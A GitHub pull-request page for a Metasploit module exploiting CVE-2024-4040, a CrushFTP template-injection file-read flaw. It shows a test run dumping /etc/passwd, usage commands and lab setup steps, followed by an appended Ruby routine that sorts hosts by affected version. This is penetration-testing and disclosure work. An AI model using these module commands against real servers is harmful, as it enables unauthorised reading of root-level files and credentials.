Closed remmons-r7 closed 1 week ago
Thanks for updating this @remmons-r7! Everything looks good to me now. I tested against version 10.5.0 and verified the requested file was correctly retrieved. I'll go ahead and land it.
msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > run verbose=true rhosts=127.0.0.1 targetfile=/etc/passwd
[*] Running module against 127.0.0.1
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Server-side template injection successful!
[*] Fetching anonymous session cookie...
[*] Using template injection to read file: /etc/passwd
[+] File read succeeded!
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
[*] Auxiliary module execution completed
This adds an exploit module that leverages an unauthenticated server-side template injection vulnerability in CrushFTP versions prior to 10.7.1 and prior to 11.1.0 (as well as legacy 9.x versions) to read any files on the server file system as root.
This module leverages an unauthenticated server-side template injection vulnerability in CrushFTP < 10.7.1 and < 11.1.0 (as well as legacy 9.x versions). Attackers can submit template injection payloads to the web API without authentication. When attacker payloads are reflected in the server's responses, the payloads are evaluated. The primary impact of the injection is arbitrary file read as root, which can result in authentication bypass, remote code execution, and NetNTLMv2 theft (when the host OS is Windows and SMB egress traffic is permitted).
Testing
To set up a test environment:
1. Set CRUSH_DIR in crushftp_init.sh to point to the correct install directory.
2. Run java -jar CrushFTP.jar to show a local client GUI interface that can be used to set up an admin account.
3. Run sudo crushftp_init.sh start to launch the software on Linux or Mac. If on Windows, run CrushFTP.exe as an administrator.
Verification
1. use auxiliary/gather/crushftp_fileread_cve_2024_4040
2. set RHOSTS <TARGET_IP_ADDRESS>
3. set RPORT <TARGET_PORT>
4. set TARGETFILE <TARGET_FILE_TO_READ>
5. set STORE_LOOT false if you want to display the file on the console instead of storing it as loot.
6. run
Example usage
Thank you!
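The description above gives the affected ranges for CVE-2024-4040 as CrushFTP prior to 10.7.1, prior to 11.1.0, and legacy 9.x. The following is an added example, not code from the Metasploit module or from this PR: a small Ruby version-gating routine a defender can run over an inventory of CrushFTP banners to sort hosts into affected, fixed and undeterminable buckets before patching or scanning. The hostnames and banner strings are constructed sample data, and `parse_crushftp_version`, `crushftp_cve_2024_4040_affected?` and `triage_crushftp_inventory` are names chosen here, not module API.

```ruby
# Added example (not part of the Metasploit module or this PR): gate a patch or
# scan effort on the affected-version ranges stated in the PR description for
# CVE-2024-4040: CrushFTP < 10.7.1, < 11.1.0, and legacy 9.x.

# Parse a CrushFTP version banner such as "10.5.0" or "11.0.3" into
# [major, minor, patch]. Missing minor/patch parts default to 0.
# Returns nil when the string does not begin with a dotted number.
def parse_crushftp_version(str)
  m = str.to_s.match(/\A\s*v?(\d+)(?:\.(\d+))?(?:\.(\d+))?/)
  return nil unless m
  [m[1], m[2] || '0', m[3] || '0'].map(&:to_i)
end

# First fixed release of each branch named in the PR description.
CRUSHFTP_FIXED = { 10 => [10, 7, 1], 11 => [11, 1, 0] }.freeze

# true  -> inside an affected range stated in the PR
# false -> at or above the fixed release for that branch
# nil   -> cannot decide from the PR's stated ranges (unparseable banner, or a
#          major version the description does not mention, such as 12.x)
def crushftp_cve_2024_4040_affected?(str)
  v = parse_crushftp_version(str)
  return nil if v.nil?
  return true if v[0] == 9            # legacy 9.x: no fixed release is listed
  fixed = CRUSHFTP_FIXED[v[0]]
  return nil if fixed.nil?
  (v <=> fixed) < 0                   # Array#<=> compares element-wise
end

# Triage an inventory of host => banner pairs into three buckets.
def triage_crushftp_inventory(inventory)
  buckets = { affected: [], fixed: [], unknown: [] }
  inventory.each do |host, banner|
    case crushftp_cve_2024_4040_affected?(banner)
    when true  then buckets[:affected] << host
    when false then buckets[:fixed] << host
    else            buckets[:unknown] << host
    end
  end
  buckets
end

# Constructed sample inventory; hostnames are placeholders.
SAMPLE_INVENTORY = {
  'ftp-a.example.test' => '10.5.0',          # the version the reviewer tested against
  'ftp-b.example.test' => '10.7.1',          # first fixed 10.x release
  'ftp-c.example.test' => '11.0.9',
  'ftp-d.example.test' => '11.1.0',          # first fixed 11.x release
  'ftp-e.example.test' => '9.4.2',           # legacy branch
  'ftp-f.example.test' => 'unknown banner',  # no version recovered
}.freeze

if __FILE__ == $PROGRAM_NAME
  triage_crushftp_inventory(SAMPLE_INVENTORY).each do |bucket, hosts|
    puts "#{bucket}: #{hosts.join(', ')}"
  end
end
```

The routine deliberately returns nil rather than false for branches the description does not name, so a host running something outside 9.x, 10.x or 11.x lands in the "unknown" bucket for manual review instead of being silently marked as fixed.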